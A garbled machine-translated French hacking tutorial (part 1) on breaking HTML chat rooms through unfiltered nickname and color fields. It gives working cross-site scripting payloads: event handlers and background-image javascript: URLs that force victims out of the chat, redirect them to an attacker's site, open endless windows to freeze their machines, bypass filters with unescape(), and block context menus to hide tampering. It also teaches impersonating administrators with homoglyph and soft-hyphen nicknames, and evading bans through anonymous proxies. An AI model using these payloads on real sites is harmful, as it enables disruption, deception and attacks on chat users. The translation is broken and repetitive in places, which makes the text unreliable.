Hacking discuter Partie 1 (théorie et pratique)



  • partie 1
  • partie 2


  • Cette page est en aucun cas ne remet pas pour des activités illicites, "krekerstvu" etc. L'objectif principal - pour étudier les caractéristiques des erreurs HTML et avertissement associé à son utilisation. Pour toute utilisation illicite de l'information fournie par l'auteur est pas responsable. À propos de tous les bugs dans les salles de chat, l' administration des chats a été informé par l'auteur.
    Tous les exemples donnés dans l'article ont été testés et fonctionnent dans MSIE 5.50.4134.0600. Efficacité dans les autres versions je ne peux pas garantir, mais je suis sûr que presque tous les exemples y travailleront.

    glossaire

    Briser un surnom (le gestionnaire sans les guillemets)
    Briser un surnom (le gestionnaire est enfermé dans des guillemets)
    Briser un surnom (le filtre ne laisse pas les citations / caractères pertinents)
    Briser la couleur (sans les guillemets attribut)
    Briser la couleur (attribut avec guillemets)
    Quels personnages doivent être vérifiés filtres
    limiteurs gestionnaires
    pseudos Forgery, pseudos vide

    théorie générale

    Ici, je veux me concentrer sur le piratage des chats Azah. Pré izvenyayus aux lecteurs avancés - ces méthodes sont bien connues et sont aussi vieux que le monde. Si vous êtes avancé assez, vous pouvez attirer l'attention sur le chapitre suivant.

    La première chose que je veux noter que chaque discussion dans leur original et unique (sauf pour les copies de cours de tsgishki publicité). Parce absolument aucun moyen universel de piratage. Presque toutes les fonctionnalités de chat sont à considérer, et sans laquelle, modèles contondants ne fonctionneront pas.

    Tout d'abord, ce que je veux dire en fait par rupture HTML dans le chat? Ce n'est pas une inondation trivial, et les attaques sur le chat IP. Dans le cadre du cambriolage, on entend toute modification non autorisée du document chat HTML, ou l'accès à des parties cachées de celui-ci (tels que Privat), à savoir un tel impact sur le chat, qui n'a pas été prévu et autorisé pour les utilisateurs. Cela vaut également non seulement les salles de clavardage et les forums, livres d'or, etc. (Lorsque toutes les méthodes décrites travaillent, et même mieux, parce que ces formes sont protégées, en règle générale, pire que les salles de chat).

    Toutes les descriptions s'appliquent uniquement aux chats HTML. Hacking Java salles de chat - une chanson séparée et complètement différent. J'espère que vous serez en mesure de distinguer un type d'une autre discussion :) ).

    Donc, nous sommes sur le chat point de HTML. Supposons que nous voulons vérifier sur la «force». Que faire d'abord? de tout ce que nous nous connectons à travers un proxy anonyme d'abord (je l'espère, vous savez ce qu'il est). Il est nécessaire pour deux raisons: d'abord, nous fournissons anonyme (qui serait l'oncle de l'administrateur giflé sur le cul), et d'autre part, si l'administrateur est toujours pas comme nos expériences et nous fermer la fenêtre dans le chat, nous pourrions passer leurs mandataires à d'autres adresses IP puis entrez le chat. Il est vrai qu'il y a une chose: l'entrée de certaines salles de chat est interdit par l'intermédiaire des procurations publiques.

    Ensuite, nous avons besoin de savoir ce que l'arme réelle que nous avons, qui est, quels attributs peut spécifier l'utilisateur. En règle générale, tous les chats peuvent entrer NICK nick nick et COLOR. En outre, il est parfois possible de mettre l'utilisateur SOAP, sa page web de la maison, le sexe, le chat, le taux, et d'autres rafraîchir. Dans l'intérêt de la pratique sont des domaines tels que la couleur, le surnom, du savon et de l'utilisateur page d'accueil. Ils sont insérés directement dans le corps du document, parce qu'il est à travers eux peuvent être attaqués dans le chat. Il convient de noter que dans certaines salles de chat pour vous inscrire et attributs de pièce définis lors de l'enregistrement et de la partie - directement devant le chat (ou déjà dans le chat). Logic avec l'enregistrement habituellement entassés plus fortement et mieux protégés.

    > Laissez - vous sur les moyens possibles de piratage. Tout d'abord être concentré sur la forme d'un fragment de code dans MDM donnée par la couleur de nos messages (par la couleur de façon peut être spécifié séparément pour le surnom, et le texte du message - vous avez besoin de vérifier à la fois, car ils peuvent être analysés par le chat différent). Pourquoi nous nous intéressons en premier lieu la couleur? Parce que la couleur est spécifiée dans la balise, dans leurs paramètres, par opposition à, par exemple, entaille, qui apparaît souvent dans le corps de la balise. Et pour briser le chat dont nous avons besoin pour l' obtenir à l' intérieur des paramètres de variables que nous pourrions changer les attributs ou collez votre script (parfois, bien sûr , toutes les balises , vous pouvez simplement écrire le texte du message, de sorte que, jusqu'à récemment, il était, par exemple, le Chat chat.rambler. ru, mais cette option est tellement stupide que ces chats n'existe probablement pas, et je ne considère pas).

    Nous sommes intéressés sous quelle forme l'information de couleur est envoyée au serveur. Le type de chaîne moins protégée, lorsque la couleur est transmise sous la forme appropriée à son nom. Par exemple:

    <select name=youcolor style="width: 70px">
    <option value=blue>синий value=blue
    <option value=red>красный
    <option value=darkred>т-красный
    <option value=green>зеленый
    <option value=black>черный value=black
    <option value=lightblue>голубой value=lightblue
    </select>

    Cette discussion est décompose habituellement en un degré ou un autre :) . Au cours de la pire des cas, si la couleur est retourné comme un code numérique:

    <select name=youcolor style="width: 70px">
    <option value=#0000FF>синий value=#0000FF
    <option value=#AF0000>красный
    <option value=#FF0000>т-красный
    <option value=green>зеленый
    <option value=#000000>черный value=#000000
    <option value=#0000AF>голубой value=#0000AF
    </select>

    Dans cette discussion, peut - être, sont les filtres pour tous les symboles sauf les nombres, signe # et les lettres A, B, C, D, E et F. Ensuite , à propos de la rupture à travers la couleur devra oublier.

    Enfin, le pire des cas, lorsque la couleur est transmise sous la forme d'un numéro de la liste des couleurs autorisées:

    <select name=youcolor style="width:70px">
    <option value=1>синий <
    <option value=2>красный <
    <option value=3>т-красный <
    <option value=4>зеленый <
    <option value=5>черный <
    <option value=6>голубой <
    </select>

    Typiquement, une telle fissure ne peut pas discuter à travers la couleur (et souvent impossible). Cette option est la plus sûre (en passant, les développeurs recommandent chats).

    Ensuite, nous devons modifier le code HTML de sorte que nous pouvons librement envoyer des valeurs d'attribut au serveur arbitraire. Pour ce faire, maintenir le site à sur le lecteur et changer la forme de connexion dans le chat (ou inscription) ainsi seduyuschim: modifier l'action relative paramètre d'URL pour former une adresse complète. Remplacer toutes les balises de type caché pour saisir du texte, et ses balises pour changer l'entrée de sélection. Il faut aussi supprimer les restrictions sur la longueur de la valeur d'entrée (le cas échéant). Par exemple, si la forme originale avait la forme suivante:



    <form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle">
    <small>Nickname:</small>
    <input type="text" name="username" size="12" maxlength="12" >
    </td>

    <td valign="middle"><small> TextColor:</small>
    <select name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue
    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=hidden name=message value="logged on.">

    <input type=hidden name="logon" value="">
    <input type=hidden name=to value="Room">
    <input type=hidden name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Donc, après que nous obtenons les substitutions correspondantes:



    <form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">

    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle"><small>Nickname:</small>

    <input type="text" name="username" >

    </td>

    <td valign="middle"><small> Text Color:</small>

    <input name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue

    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=text name=message value="logged on.">

    <input type=text name="logon" value="">

    <input type=text name=to value="Room">
    <input type=text name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Notez que le document peut être créé dynamiquement par la fonction type document.write (), puis, très probablement, vous aurez à le convertir en une vue statique. De plus, il arrive souvent que, après le stockage du HTML sur le disque, ne veut pas ouvrir le chat. Cela peut être dû au fait que le site n'a pas été complètement sauvegardée si elle est composée de cadres. Dans ce cas, vous devez comprendre plus en profondeur la structure de la page et le maintenir droit. Une autre raison peut être que le serveur assure le suivi de la demande champ titre HTTP Referer, et d' identifier ce que nous ne sommes pas allés à sa page. Dans ce cas, vous avez besoin d'utiliser d'autres méthodes qui seront abordés dans le chapitre intitulé "Hacking http".

    Nous sommes en train d'expérimenter avec chat. Tout d'abord, vous devez savoir quels filtres sont sur les valeurs d'entrée (première pour la couleur et surnom). Nous sommes principalement intéressés par les caractères suivants:

    " ' ` = < > ; \ & % écart

    Saisissez-les dans le domaine de la couleur et Nick aller dans la salle de chat (si nous voulons être autorisés à ces attributs, sinon vide, devra trier les caractères un par un), et voir ce que les caractères étaient filtre sautée (écrire dans le chat que le type de fil "bonjour", et posmortev dans le texte HTML caractères qui couleurs et pseudo sont présents). Certains chats simplement supprimé les symboles filtrés, certains de les remplacer par d' autres personnages, et certains sont converties en une forme codée comme <ou '. Ces caractères convertis ne nous conviennent pas, parce que le HTML ne les perçoit pas (mais plus à ce sujet, voir "A quelques hacks souffrance dans le chat T").

    Par conséquent, nous devrions avoir une liste de caractères de saut pour chaque attribut du formulaire d'inscription.

    En outre, notre objectif est d'obtenir l'intérieur de tout tag pour cela changer son pramatry ou collez votre script là. Il y a deux façons fondamentalement différentes de faire cela: la première est que nous avons le bon code est transmis par les attributs qui sont déjà dans la balise (entre les crochets) - par exemple, à travers la couleur ou l' adresse du savon. Le second est, qui briserait la structure de code HTML afin que nous ayons le bon code était dans la balise. Comment le faire est déterminé à partir de l'analyse de la structure spécifique du code Kourtchatov et ensemble non filtré de caractères pour nos attributs. Divers modes de réalisation considèrent que la fissuration dans les exemples suivants. En attendant, je voudrais souligner quelques-unes des fonctionnalités HTML qui permettent effectivement «effets» intéressants.

    Caractéristiques HTML

    P> Ici, je ne vais pas donner une conférence sur HTML pour les nuls. J'espère que vous savez ce qu'est un tag et ses paramètres sont familiers avec JavaScript et écrit au moins une page Web dans sa vie sur le HTML (au lieu de FrontPage).

    Le plus gros problème (et avec elle la puissance de) le code HTML qu'il ne dispose pas d'une norme unique. Autrement dit, il est comme il est, mais les normes sont si hétérogènes, et il y a tellement entrelacés en HTML, que personne ne connaît à fond (et souvent ne sait pas ce qu'il est). Outre la concurrence entre les navigateurs et les sites promiscuité conduit au fait que les navigateurs essaient de maintenir le plus grand nombre possible des normes et de la technologie. En outre, l'absence de normes communes a conduit au fait que même des maîtres sur la même page intercalés Web parviennent à écrire dans des styles différents :. Sur (Cependant, cela permet aux pirates de pénétrer dans le code HTML, et offre un grand nombre de maux de tête pour les développeurs.

    Une simple question: Quelles sont les délimiteurs en HTML et JavaScript? Même moi, je ne peux pas répondre immédiatement et clairement sur cette question. Prenons l'exemple suivant:

    <font onclick= "alert()">Text</font>

    Ici, tout est clair et évident. Il y a une étiquette qui a un gestionnaire d'événements clic, écrit en JavaScript, dont le texte est entre guillemets. Qu'est-ce que JavaScript ispolzute peut être spécifié explicitement:

    <font onclick="javascript:alert()">Text</font>

    ligne Délimiteur dans ces exemples sont les guillemets doubles. Cependant, vous pouvez le faire sans eux. Parce que , après onclick = ne peut static line-gestionnaire, HTML permet d'omettre les guillemets (cela vaut pour de nombreux cas où l'argument ne peut être une chaîne constante). Ainsi, cette conception fonctionne aussi:

    <font onclick=alert()>Text</font>

    et maintenant, au lieu d'un message vide insérer quelque chose de significatif:

    <font onclick=alert('Привет друзья!')>Text</font>

    Ouverture du lien de démonstration montre que cet exemple ne fonctionne pas. La raison est la suivante: le corps du gestionnaire ne peut pas être enfermé dans des guillemets, mais dans ce cas, la première ligne est considéré comme un espace processeur-end (même si l'écart est à l'intérieur des guillemets). Par conséquent, le navigateur considère gestionnaire seulement un fragment d'alerte ( «Bonjour, et de trouver des devis découverte donne un message d'erreur Pourquoi le navigateur ne répond pas au fait que l' espace est à l' intérieur des citations que je pense que la raison est que , on mélange deux langues:.? HTML et JavaScript. Browser "vu" que , après le signe = sans guillemets et donc regardé un écart - .. comme la fin du gestionnaire à l' intérieur du gestionnaire comme pour le moment pas intéressé, car il ne fait pas référence à HTML, et un JavaScript ouvrant ainsi citation qu'il n'a tout simplement pas remarqué, et . Je pris un espace au-delà de la fin de la mise en oeuvre suivante de conception sans erreur:

    <font onclick="alert('Привет друзья!')">Text</font>
    <font onclick=alert('Привет_друзья!')>Text</font>
    <font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
    <font color=alert('Привет друзья!')>Text</font>

    Remarque importante caractéristique: si la valeur du paramètre de la balise est entre guillemets, l'espace avant l'option suivante peut être omise (la troisième ligne de l'exemple). Exemple travaille également quatrième ligne (dans le sens que le navigateur ne jure pas, mais le script ne fonctionne certainement pas), parce que le navigateur ne considère pas le contenu de la couleur de l' attribut JavaScript-ohm, et donc ne pas jurer sur devis à découvert, bien que la valeur de couleur est pris seulement un fragment d'alerte ( ' Bonjour (comme une couleur en HTML peut agir comme une chaîne arbitraire, dans ce cas, le navigateur convertit la chaîne à une valeur numérique et estime que la couleur).

    Y at - il d' autres personnages - le gestionnaire arrête sans les guillemets (sauf l' espace et le caractère>) - une question ouverte. Je ne sais pas du, mais je suppose qu'ils peuvent être.

    Comme on l'a vu à partir de ces exemples, les limiteurs lignes peuvent être des guillemets doubles et simples. Cela vaut également pour HTML, et un JavaScript, cependant, il y a au moins un symbole qui est des lignes de limite au format HTML (mais pas JavaScript!). Il backquote `(généralement situé sur la même touche avec la lettre E). On peut voir dans l'exemple suivant:

    <font onclick=`alert('Привет друзья!')`>Text</font>

    Je jure que au moins 90% des webmasters ne sais pas! Quoi qu'il en soit, je ne l'ai pas vu, ce serait quelqu'un a appliqué une apostrophe inverse. Ce personnage - une aubaine pour un pirate :) ).

    Il arrive souvent que vous devez utiliser des guillemets à l'intérieur de celui - l'autre. Et il est difficile, surtout si le chat passe un seul type de guillemets. Mais il se JavaScript vous permet d'intégrer les constantes de chaîne à l'intérieur d'autres constantes de chaîne, et en même temps en utilisant une seule et même citation marques sont E! Par exemple:

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')'

    L'exemple utilise les guillemets simples intégrés, mais l'interprète ne délivre pas une erreur. Notez que le contenu des guillemets internes ne sont pas arbitraires: il ne doit pas contenir d' espaces, et à la fin, certains caractères ne sont pas autorisés, par exemple; ou).

    Maintenant, nous allons parler de liens. La première chose à noter ce détail: le développement de l'Internet est arrivé afin qu'il mélangé technologie complètement différente. L'accès à l'information peut avoir lieu à travers un grand nombre de protocoles différents. Donc, vous pouvez spécifier du navigateur de protocoles familiers lorsque vous spécifiez le chemin complet du document (URL). Il est à noter que le javascript est également attribué aux protocoles (bien que ce n'est pas, mais il semble que les développeurs ont pensé qu'il serait trop audacieux pour mettre en évidence le concept de scripts séparés, et les ont classés au procès-verbal). Par conséquent, chaque fois dans le document HTML, vous pouvez spécifier une URL, vous pouvez insérer le script. Et ce script sera exécuté lorsque l'utilisateur (ou le navigateur lui-même) demandera le lien donné. Par exemple:

    <a href=javascript:alert()>Text</a>

    Fait intéressant, en plus des opérateurs, en référence au JavaScript, vous pouvez simplement spécifier la chaîne (ou numérique) valeur (mais certainement après l'opérateur, le cas échéant). En cliquant sur ce lien , le navigateur d' abord effectuer devant atteindre les opérateurs, puis ouvrez un nouveau document et de mettre la valeur de ce dernier dans la ligne de lien:

    <a href=javascript:alert();'Hello!!'>Text</a> Je note que les tags insérer une nouvelle page est impossible.

    Hacking le chat R

    Voici un exemple de l'une des premières conversations que je compromise. Cette discussion a été très simple, et nous casser ce qu'on appelle la première approche :) ).

    Et maintenant, il y a peu de conversations dans lesquelles il se déroule. Bien que je pensais de ces méthodes moi, mais je les ai trouvés dans les magazines pirates.

    sous forme d'entrée de ce chat est exactement conforme à la forme prévue à la «Théorie générale». Après la conversion, et enregistrez le formulaire sur le disque, j'ai vérifié ce que les personnages sont dans l'attribut de couleur. Il est avéré que ceux-ci sont des symboles (de ceux que nous sommes intéressés, voir le chapitre «Théorie générale».):

    ' ` = ; % écart

    Et bien sûr, étaient tous les chiffres et les lettres. La longueur de la chaîne des valeurs de couleurs ne sont pas limitées. Puis je regardai où il est inséré dans la couleur du cadre de message. Voici un fragment du cadre:

    <font color=Black><b>Путник</b>- Alpha, привет ))</font>
    <font color=Red><b>Alpha</b>- Всемприветик !!</font>

    Comme vous pouvez le voir, la couleur insérée sans les guillemets entourant. Cela me convient. Je me suis connecté sous le nom Shram (ou presque sous le même nom;)) et rouge size = 20 couleurs. Mon message était le suivant:

    <font color=red size=20><b>Algol</b>- Hi</font>

    Il affiche une très grande police, qui a surpris un peu la population de chat :) ).

    Ainsi, malgré le fait que nous ne pouvions pas insérer des balises de neposredstveno mais permettre l' entrée dans la couleur de l' espace d'attribut nous a permis de définir les paramètres tag non autorisée. Cependant, pour moi, ce fut certainement pas assez. Modifier la taille de la police certainement cool, mais vraiment quelque chose d'utile peut être fait que par l'utilisation de scripts. Insérez directement balise script, je ne pouvais pas (ou plutôt, à cette époque , je ne savais pas comment le faire). Mais je ne pouvais demander un gestionnaire à toute balise d'événement. Voilà ce que je demandais la couleur qui supprimerait ce que certains idiot du chat:
    #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30. Et puis il a envoyé un long message de long en privé. Couleur des messages que je repris d'une manière telle qu'il ne serait pas différente de la couleur de fond. Une taille de la police et la longueur des messages étaient tellement énorme que probablement une fois la victime marchait selon la souris, ce qui entraîne dans mon gestionnaire onmouseover appuyé sur le bouton "Chat off" au lieu de l'utilisateur :) ).

    Cependant, peu à peu, il y avait les experts qui ont vu à travers un tour et délibérément roulé sur une fenêtre de chat. Mon script ne fonctionne pas toujours :( (. Au début, je pensais qu'il n'y avait aucun moyen. Parce que je peux intégrer le script seulement comme un gestionnaire d'événements, puis, si l'événement ne se produit pas, et le script ne fonctionne pas. Mais, en creusant dans les "Annales", je trouve une solution (à l'heure actuelle, il est devenu trivial et bien connu). il est apparu que l'attribut de style, vous pouvez inclure l'URL de l'image d'arrière - plan pour la balise. et où vous pouvez spécifier une URL, il peut être écrit et le script. et la chose principale est que l'image de fond est lui-même chargé, après le chargement d' un document HTML! Si je voulais alerte le chat montrent les participants, je connecte avec les couleurs suivantes:

    style=background-image:url(javascript:alert('приветик_всем_!!'));

    Il convient de noter un détail important: que la structure de la plupart chat HTML est que la page est mise à jour régulièrement, de sorte que le script est exécuté envoyé plus d'une fois, mais beaucoup, jusqu'à ce que notre message ne va pas disparaître de l'écran.

    Mais comme il est maintenant regardé la valeur d'attribut de couleur pour jeter le chat:

    style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click());

    Nous devons nous rappeler que le script envoyé au privé, verra non seulement votre «compagnon», mais vous, alors vous devez savoir comment se protéger contre les effets du script. Cela peut se faire de deux façons: soit de se mettre à ignorer (et nous ne verrons pas leurs propres messages), ou les paramètres de votre navigateur pour interdire l'affichage des images. Ensuite, le script est déclenché via une image d'arrière-plan ne fonctionnera pas.

    Maintenant, je veux montrer nekotrye scripts utiles qui peuvent être utilisés dans les chats fissurés:

    javascript: naviguer ( 'http://myserver.ru') ; - Les charges dans le cadre actuel (ou la page) Site myserver.ru.
    Certaines salles de chat, quand un http fragment: // trouver ce lien, et insérez automatiquement <a> tag. Parce qu'il va détruire notre script, cela ne devrait pas être autorisé. Pour ce faire, simplement omettre le préfixe http: (qui est déjà la valeur par défaut). Ensuite, le script ressemblera: javascript: naviguer ( '// myserver.ru' ); .Dva Aller de l'avant slash - sont obligatoires.

    javascript: parent.frames [2] .document.location = 'http: //myserver.ru' - charges dans l' un des sites de cadres myserver.ru.

    javascript: for (;;) open ( ) - ouvre un nombre infini de fenêtres (si vous n'orientez pas dans le temps, conduit à un blocage de la machine, puis redémarrer).

    javascript: document.write ( '<script> alert () </ script>') - remplace l'image actuelle du script, qui est ensuite exécuté. Remarque: Si chutney saute symboles <et> (ce qui est le grand nombre de chats) est un script que nous ne pouvons pas coller. Mais il y a un moyen de sortir. Cette fonction demande unescape (), qui convertit le code ASCII caractères dans le caractère. Remplacer les équerres dans la fonction unescape () et un code correspondant, le script devient:

    javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) 3C') + 'script' + unescape ( '% 3E') + 'alert ()' + unescape ( '% 3C') + '/ script' + unescape ( '% 3E javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' - image inserts après le texte. Notez que dans IE 5.x, vous pouvez insérer toutes les balises sauf pour FRAME, IFRAME et SELECT.

    Mais dans IE 4.x createElement () fonction permet l'insertion de seulement balise IMG, AREA et OPTION. Informations sur Netscape n'a pas, vous pouvez vous expérimenter. 'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' event.returnValue = alert (st) * 'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' / * bloquer le menu déroulant de la page, et ne permet donc vue indisponible contenu HTML dans le cadre. Ceci permet de dissimuler leur manipulation du corps du chat :) ). * / Parfois, il est des journaux utiles sous un autre surnom. Causeries avec le système d'enregistrement des utilisateurs ne vous laissera pas le faire si vous ne connaissez pas le mot de passe (et que vous avez sans doute jamais). sortie Banal: enregistrement avec le surnom où l'alphabet latin zamenyatesya une lettre très similaire de mise en page russe. Par exemple , Logins sous le nom d' administration où la lettre latine et remplacés par russe. méthode primitive, mais cela fonctionne)). Il y a aussi des cas plus graves. Par exemple, dans certaines salles de chat est interdit d'utiliser un pseudo caractères de différentes dispositions. Puis esprit curieux, il ne reste plus rien à faire, mais se tourner vers l'oncle Gates aide. Et ici, il est la bonté humaine, Microsoft n'a pas oublié les utilisateurs méchants et nous a donné un symbole ­ (Aka ­ aka% AD), qui est lui - même appelé Microsoftware "trait d' union Soft" ( "tirets courts"). Il ressemble vraiment à tirets Word et dans Excel, aussi, et même dans un ordinateur portable, mais pas dans IE! Pour symbole eskplorera maykrosoftovskih ­ n'existe tout simplement pas, qui est, il semble être là, mais il a oublié de faire une représentation graphique. Il vient tout simplement ne soit pas attiré dans la page HTML! Ainsi, l'ajout d'un tiret court à tout nick et si vous inscrire en dessous, nous entrer dans une conversation avec un surnom qui apparaîtra dans la page HTML comme un surnom sans trait d'union. Et vous pouvez faire encore plus raide - connexion sous le nom, seuls les caractères sotoyaschim tiret court. Puis tout votre pseudo ne sera pas apparaître dans le chat, absolument espace vide)).

    (Note: tinker Yeshe bit symbole tiret court, je trouvais toujours des cas où il apparaît: Il apparaît seulement comme un trait d'union Autrement dit, si, dans un mot vaut un court tableau de bord, et si le mot est de la ligne de fond, la partie du mot après le trait d'union peut. être transféré à la ligne suivante, et le trait d'union est visible est ainsi possible trait d'union invisible - une caractéristique délibérée de Microsoft (qui, incidemment, ne diminue pas son utilité dans le piratage :) ). La vérité ne voit pas pourquoi il reste toujours visible dans d'autres applications?)



    Suivant 2 heures. >>